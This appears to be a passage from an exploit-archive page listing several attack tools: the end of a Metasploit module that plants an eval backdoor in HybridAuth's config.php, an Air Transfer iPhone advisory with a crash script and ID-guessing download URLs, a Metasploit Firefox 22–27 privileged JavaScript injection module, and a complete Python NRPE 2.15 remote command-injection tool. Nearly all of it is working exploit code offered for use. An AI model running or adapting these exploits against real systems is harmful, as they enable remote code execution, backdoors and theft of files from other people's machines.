OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
], self.class)
end

#
# Check:
# * install.php exists
# * config.php is writable
# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
#
def check
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
if !res
vprint_error "#{peer} - Connection failed"
return Exploit::CheckCode::Unknown
elsif res.code == 404
vprint_error "#{peer} - Could not find install.php"
elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
vprint_error "#{peer} - #{$1} is not writable"
elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
vprint_status "#{peer} - Found version: #{version}"
if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
return Exploit::CheckCode::Vulnerable
else
vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
end
end
Exploit::CheckCode::Safe
end

#
# Exploit
#
def exploit
# check vuln
if check != Exploit::CheckCode::Vulnerable
fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
end

# write backdoor
print_status "#{peer} - Writing backdoor to config.php"
payload_param = rand(1000)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
)
if !res
fail_with Failure::Unknown, "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Wrote backdoor successfully"
else
fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
end

# execute payload
code = Rex::Text.encode_base64(payload.encoded)
print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'config.php'),
'data' => "#{payload_param}=#{code}"
}, 5)
if !res
print_warning "#{peer} - No response"
elsif res.code == 404
fail_with Failure::NotFound, "#{peer} - Could not find config.php"
elsif res.code == 200 || res.code == 500
print_good "#{peer} - Sent payload successfully"
end

# remove backdoor
print_status "#{peer} - Removing backdoor from config.php"
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => 'OPENID_ADAPTER_STATUS='
)
if !res
print_error "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Removed backdoor successfully"
else
print_warning "#{peer} - Could not remove payload from config.php"
end
end
end

Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities Unknown rwxr-xr-x 0 10:16 AM

Filename	Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities
Permission	rw-r--r--
Author	Unknown
Date and Time	10:16 AM
Label
Action

# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access.
# Date: 08/23/2014
# Category: WebApp
# Version: 1.3.9
# Patch/ Fix: Not available
---------------------------------------------------

Disclosure Time line
=======================
[Aug. 19 2014] Vendor Contacted
[Aug. 19 2014] Vendor replied
[Aug. 19 2014] Vendor Informed about vulnerability with POC.(No reply received)
[Aug. 21 2014] Notified vendor about Public disclosure after 24 hours (No reply received)
[Aug. 23 2014] Public Disclosure.

--------------------------------------------------------

Product & Service Details:
==========================
Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.

Features include:
-----------------

* The easiest way to transfer files between PC and iPhone/iPad !
* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !

Vulnerability details
=========================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/python
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=raw_input("Enter IP : ")
port=8080
def connect():
try:
s.connect((str(host),port))
except socket.error:
print "Error: couldn't connect"
sys.exit()
return "connected to target"
#Crashing the App
def crashing():
req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
try:
s.sendall(req)
except:
print "Error occured, Couldn't crash App"
sys.exit()
return "Application Down, Conection closed"
print connect()
print crashing()
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file simply visit:

http://<IP>:8080/?downloadSingle?id=1

Just by incrementing the value of "id" we can download all the files.

TO view saved memos visit the below link:

http://<IP>:8080/getText?id=0

We can look for all the memos by incrementing the value of "id"

Firefox WebIDL Privileged Javascript Injection Unknown rwxr-xr-x 0 10:16 AM

Filename	Firefox WebIDL Privileged Javascript Injection
Permission	rw-r--r--
Author	Unknown
Date and Time	10:16 AM
Label
Action

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

autopwn_info({
:ua_name => HttpClients::FF,
:ua_maxver => "22.0",
:ua_maxver => "27.0",
:javascript => true,
:rank => ExcellentRanking
})

def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox WebIDL Privileged Javascript Injection',
'Description' => %q{
This exploit gains remote code execution on Firefox 22-27 by abusing two
separate privilege escalation vulnerabilities in Firefox's Javascript
APIs.
},
'License' => MSF_LICENSE,
'Author' => [
'Marius Mlynski', # discovery and pwn2own exploit
'joev' # metasploit module
],
'DisclosureDate' => "Mar 17 2014",
'References' => [
['CVE', '2014-1510'], # open chrome:// url in iframe
['CVE', '2014-1511'] # bypass popup blocker to load bare ChromeWindow
],
'Targets' => [
[
'Universal (Javascript XPCOM Shell)', {
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[
'Native Payload', {
'Platform' => %w{ java linux osx solaris win },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(22, 27) }
}
))

register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
], self.class)
end

def on_request_exploit(cli, request, target_info)
send_response_html(cli, generate_html(target_info))
end

def generate_html(target_info)
key = Rex::Text.rand_text_alpha(5 + rand(12))
frame = Rex::Text.rand_text_alpha(5 + rand(12))
r = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"

js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];

// Load the chrome-privileged browser XUL script into an iframe
var c = new mozRTCPeerConnection;
c.createOffer(function(){},function(){
window.open('chrome://browser/content/browser.xul', '#{frame}');
step1();
});

// Inject a data: URI into an internal frame inside of the browser
// XUL script to pop open a new window with the chrome flag to prevent
// the new window from being wrapped with browser XUL;
function step1() {
var clear = setInterval(function(){

// throws until frames[0].frames[2] is available (when chrome:// iframe loads)
frames[0].frames[2].location;

// we base64 this to avoid the script tag screwing up things when obfuscated
frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
clearInterval(clear);
setTimeout(step2, 100);
},10);
}

// Step 2: load the chrome-level window up with a data URI, which
// gives us same-origin. Make sure to load an "<iframe mozBrowser>"
// into the frame, since that will respond to our messageManager
// (this is important later)
function step2() {
var clear = setInterval(function(){
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
'src="about:blank"></iframe></body></html>';
clearInterval(clear);
setTimeout(step3, 100);
}, 10);
}

function step3() {
var clear = setInterval(function(){
if (!frames[0]) return; // will throw until the frame is accessible
top.vvv.messageManager.loadFrameScript('data:,'+key, false);
clearInterval(clear);
setTimeout(function(){top.vvv.close();}, 100);
}, 10);
}

|)

js.obfuscate

%Q|
<!doctype html>
<html>
<body>
<iframe id='#{frame}' name='#{frame}'
style='position:absolute;left:-9999999px;height:1px;width:1px;'>
</iframe>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
end
end

NRPE 2.15 - Remote Code Execution Vulnerability Unknown rwxr-xr-x 0 10:15 AM

Filename	NRPE 2.15 - Remote Code Execution Vulnerability
Permission	rw-r--r--
Author	Unknown
Date and Time	10:15 AM
Label
Action

#!/usr/bin/python
#
#
# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability
#
# Discovered by : Dawid Golunski
# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>
# http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)
#
# [root@localhost ~]# pip-python install pyOpenSSL
#
# NRPE <= 2.15 Remote Command Execution Vulnerability
# Release date: 17.04.2014
# Discovered by: Dawid Golunski
# Severity: High
# CVE-2014-2913
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913
# http://www.exploit-db.com/exploits/32925/
# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)
#
# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x
#
# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE
#

import OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/
import optparse
import os
import signal
import socket
import struct
import sys
import time

banner = """

$$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\\
$$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____|
$$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ |
$$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\\
$$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\\
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ |
$$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\\$$$$$$ |
\__| \__|\__| \__|\__| \________| \________|\__|\______|\______/

$$$$$$$\ $$$$$$\ $$$$$$$$\\
$$ __$$\ $$ __$$\ $$ _____|
$$ | $$ |$$ / \__|$$ |
$$$$$$$ |$$ | $$$$$\\
$$ __$$< $$ | $$ __|
$$ | $$ |$$ | $$\ $$ |
$$ | $$ |\$$$$$$ |$$$$$$$$\\
\__| \__| \______/ \________|
NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n

=============================================
- Release date: 17.04.2014
- Discovered by: Dawid Golunski
- Severity: High
- CVE: 2014-2913
=============================================

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""
# Plugin list for Brute force mode
PluginList = ['check_all',
'check_apt',
'check_bdii',
'check_bonding',
'check_breeze',
'check_by_ssh',
'check_check-updates',
'check_check_sip',
'check_cluster',
'check_dhcp',
'check_dig',
'check_disk',
'check_disk_smb',
'check_dns',
'check_dpm-disk',
'check_dpm-head',
'check_dummy',
'check_file_age',
'check_flexlm',
'check_fping',
'check_game',
'check_hpjd',
'check_http',
'check_icmp',
'check_ide_smart',
'check_ifoperstatus',
'check_ifstatus',
'check_ircd',
'check_lcgdm',
'check_lcgdm-common',
'check_ldap',
'check_lfc',
'check_linux_raid',
'check_load',
'check_log',
'check_mailq',
'check_mrtg',
'check_mrtgtraf',
'check_mysql',
'check_nagios',
'check_nrpe',
'check_nt',
'check_ntp',
'check_nwstat',
'check_openmanage',
'check_oracle',
'check_overcr',
'check_perl',
'check_pgsql',
'check_ping',
'check_procs',
'check_radius',
'check_real',
'check_rhev',
'check_rpc',
'check_sensors',
'check_smtp',
'check_snmp',
'check_ssh',
'check_swap',
'check_tcp',
'check_time',
'check_ups',
'check_users',
'check_wave']

# nrpe 2.15 skip chars "|`&><'\"\\[]{};" and "$()" but not "\x0a"(new line)
evilchar = "\x0a"

QUERY_PACKET = 1
RESPONSE_PACKET = 2

NRPE_PACKET_VERSION_2 = 2

# max amount of data we'll send in one query/response
MAX_PACKETBUFFER_LENGTH = 1024

#def debug(sMessage):
# """Send a string to STDERR"""
# if DEBUG:
# sys.stderr.write("%s\n" % sMessage)

class DataPacket:
"""A Python implementation of the C struct, packet."""
def __init__(self, packet_version, packet_type):
self.nPacketVersion = packet_version # int16
self.nPacketType = packet_type # int16
self.nCRC32 = 0 # u_int32
self.nResultCode = 2324 # int16
self.sData = ''
self.tCRC32 = (
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
0x2d02ef8d)

def __str__(self):
# Turn whatever string data we have into a null terminated string
if len(self.sData) < MAX_PACKETBUFFER_LENGTH:
sData = self.sData + "\0" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))
sData += "SR" # not sure about this, from perl
elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:
sData = self.sData
else:
raise ValueError("CHECK_NRPE: invalid input")
# Return a string that equals the C struct, not something printable
return struct.pack("!hhLh" + str(len(sData)) + "s", self.nPacketVersion,
self.nPacketType, self.nCRC32, self.nResultCode, sData)

def __len__(self):
return len(self.__str__())

def dumpself(self):
"""Debugging output for self as C structure.

Not normally used."""
sElf = self.__str__()
sPrev = sElf[0:1]
nCount = 0
ii = -1
for sChar in sElf[1:]:
ii += 1
if sChar == sPrev:
nCount += 1
continue
if nCount:
print "%d\t%d *" % (ii - nCount, nCount + 1),
nCount = 0
else:
print "%d\t" % ii,
print "\t'%s' (%d)" % (sPrev, ord(sPrev))
sPrev = sChar
print "%d\t\t'%s' (%d)" % (ii + 1, sPrev, ord(sPrev))

def calculate_crc32(self):
"""Calculate the CRC32 value for the string version of self."""
nCRC = 0xFFFFFFFF
for ii in self.__str__():
nIndex = (nCRC ^ ord(ii)) & 0xFF
nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]
self.nCRC32 = nCRC ^ 0xFFFFFFFF
#debug("DataPacket.calculate_crc32 = %d" % self.nCRC32)

def extract(self, sQuery):
"""Turn a string into the DataPacket attributes."""
#debug("DataPacket.extract(%d)" % len(sQuery))
tVals = struct.unpack("!hhLh" + str(len(sQuery) - 10) + "s", sQuery)
self.nPacketVersion = tVals[0]
self.nPacketType = tVals[1]
self.nCRC32 = tVals[2]
self.nResultCode = tVals[3]
self.sData = tVals[4]

m_nTimeout = 0
def alarm_handler(nSignum, oFrame):
"""Timeout catcher"""
raise KeyboardInterrupt("CHECK_NRPE: Socket timeout after %d seconds." %
m_nTimeout)

class NrpeClient(DataPacket):
"""Everything needed to send a message to an NRPE server and get data back.
"""
def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,
packet_version=NRPE_PACKET_VERSION_2):
DataPacket.__init__(self, packet_version, QUERY_PACKET)
self.sServer = server_name
self.nPort = server_port
self.bUseSSL = use_ssl
self.nTimeout = timeout

def run_query(self, sQuery):
"""Connect to the NRPE server, send the query and get back data.
"""
# initialize alarm signal handling and set timeout
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(self.nTimeout)

# try to connect to the host at the given port number
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# do SSL handshake
if self.bUseSSL:
oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
oContext.set_cipher_list('ADH')
oConnection = OpenSSL.SSL.Connection(oContext, oSocket)
else:
oConnection = oSocket

oConnection.connect((self.sServer, self.nPort))

# we're connected and ready to go
self.sData = sQuery
self.nCRC32 = 0
self.calculate_crc32()

# send the packet
oConnection.send(str(self))

# wait for the response packet
sRval = oConnection.recv(len(self))

# close the connection
if self.bUseSSL and not oConnection.shutdown():
try:
sRval += oConnection.recv(len(self))
except OpenSSL.SSL.ZeroReturnError:
pass
oSocket.close()
del oSocket, oConnection
if self.bUseSSL:
del oContext

# reset timeout
signal.alarm(0)

if len(sRval) == 0:
raise IOError("CHECK_NRPE: Received 0 bytes from daemon." +
"Check the remote server logs for error messages.")
elif len(sRval) < len(self):
raise IOError("CHECK_NRPE: Receive underflow - only " +
"%d bytes received (%d expected)." % (len(sRval), len(self)))

# Become the received data
self.extract(sRval)

# check the crc 32 value
nRvalCRC = self.nCRC32
self.nCRC32 = 0
self.calculate_crc32()
if nRvalCRC != self.nCRC32:
raise ValueError("CHECK_NRPE: Response packet had invalid CRC32.")

# check packet version
if self.nPacketVersion != NRPE_PACKET_VERSION_2:
raise ValueError("CHECK_NRPE: Invalid packet version received from server.")

# check packet type
if self.nPacketType != RESPONSE_PACKET:
raise ValueError("CHECK_NRPE: Invalid packet type received from server.")

# Turn the input data into a proper python string (chop at first NULL)
for ii in range(len(self.sData)):
if self.sData[ii] == "\0":
break
self.sData = self.sData[0:ii]

if __name__ == '__main__':
m_oOpts = optparse.OptionParser("%prog -H Host_or_IP -c nrpe_command --cmd=\"command to execute\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]")
m_oOpts.add_option('--host', '-H', action='store', type='string',
help='The address of the host running the NRPE daemon (required)')
m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,
help='Do no use SSL')
m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,
help='The port on which the daemon is running (default=5666)')
m_oOpts.add_option('--timeout', '-t', action='store', type='int',
default=10,
help='Number of seconds before connection times out (default=10)')
m_oOpts.add_option('--command', '-c', action='store', type='string',
#default='get_data',
help='The name of nrpe command')
m_oOpts.add_option('--brute', '-b', action='store_true', default=False,
help='Find existing nrpe command from list [ -list ]')
m_oOpts.add_option('--list', action='store_true', default=False,
help='Show NRPE Command list')
m_oOpts.add_option('--cmd', action='store', type='string',
help='Command to execute on the remote server')

m_oOptions, m_lArgs = m_oOpts.parse_args()
m_nTimeout = m_oOptions.timeout
m_sQuery = m_oOptions.command
m_gList = m_oOptions.list
m_sBrute = m_oOptions.brute

print (banner)

if m_gList:
print('[+] NRPE Command list\n')
for LinesPluginList in PluginList:
print(LinesPluginList)
sys.exit(0)
elif m_sQuery and m_sBrute:
print m_oOpts.format_help()
print('[!]')
print('[!] ERROR: Select only -c OR -b option\n')
sys.exit(0)
elif not m_oOptions.host or not m_oOptions.cmd:
print m_oOpts.format_help()
sys.exit(0)

print('[+] Target: '+m_oOptions.host)
print('[+] Command: '+m_oOptions.cmd+' \n')

if m_sBrute:
print('[+] Brute force Mode....')
print('[+]')
for LinesPluginList in PluginList:

m_CommandQuery = ""
m_CommandQuery += ' ' + m_oOptions.cmd
if m_lArgs:
m_CommandQuery += ' ' + ' '.join(m_lArgs)

m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'

m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
m_oOptions.timeout)
try:
m_oNRPE.run_query(m_sQuery)
except socket.error:
print('[!] Connection Error!')
sys.exit(1)
except OpenSSL.SSL.ZeroReturnError:
print('[!] Not Vulnerable')
print('[!] Option dont_blame_nrpe disabled or service fixed')
sys.exit(1)

if m_oNRPE.sData[-11:] == "not defined":
print('[-] Checking for NRPE command '+LinesPluginList+':\t\t\tnot found')
else:
print('[+] Checking for NRPE command '+LinesPluginList+':\t\t\tVULNERABLE!')
print('[+]')
print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
print('[+]')
print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
print('[+]')
print(m_oNRPE.sData)
sys.exit(0)
elif m_sQuery:
print('[+] Custom command Mode....')
print('[+]')
print('[+] Connecting......')

m_CommandQuery = ""
m_CommandQuery += ' ' + m_oOptions.cmd
if m_lArgs:
m_CommandQuery += ' ' + ' '.join(m_lArgs)

m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'

m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
m_oOptions.timeout)
try:
m_oNRPE.run_query(m_sQuery)
except KeyboardInterrupt:
print("[!] CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout)
sys.exit(1)
except socket.error:
print('[!] Connection Error!')
sys.exit(1)
except OpenSSL.SSL.ZeroReturnError:
print('[!] Not Vulnerable')
print('[!] Option dont_blame_nrpe disabled or service fixed')
sys.exit(1)

if m_oNRPE.sData[-11:] == "not defined":
print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')
else:
print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')
print('[+]')
print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
print('[+]')
print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
print('[+]')
print(m_oNRPE.sData)
sys.exit(0)

xDay Exploit

Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros] Unknown rwxr-xr-x 3 12:42 PM

Paidverts [Imacros] Exploit Unknown rwxr-xr-x 1 12:37 PM

Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:22 AM

Gitlab-shell Code Execution Unknown rwxr-xr-x 1 10:20 AM

WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:20 AM

The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution Unknown rwxr-xr-x 0 10:19 AM

Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload Unknown rwxr-xr-x 0 10:18 AM

Calavera UpLoader 3.5 - SEH Buffer Overflow Unknown rwxr-xr-x 0 10:17 AM

HybridAuth install.php PHP Code Execution Unknown rwxr-xr-x 0 10:16 AM

Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities Unknown rwxr-xr-x 0 10:16 AM

Firefox WebIDL Privileged Javascript Injection Unknown rwxr-xr-x 0 10:16 AM

NRPE 2.15 - Remote Code Execution Vulnerability Unknown rwxr-xr-x 0 10:15 AM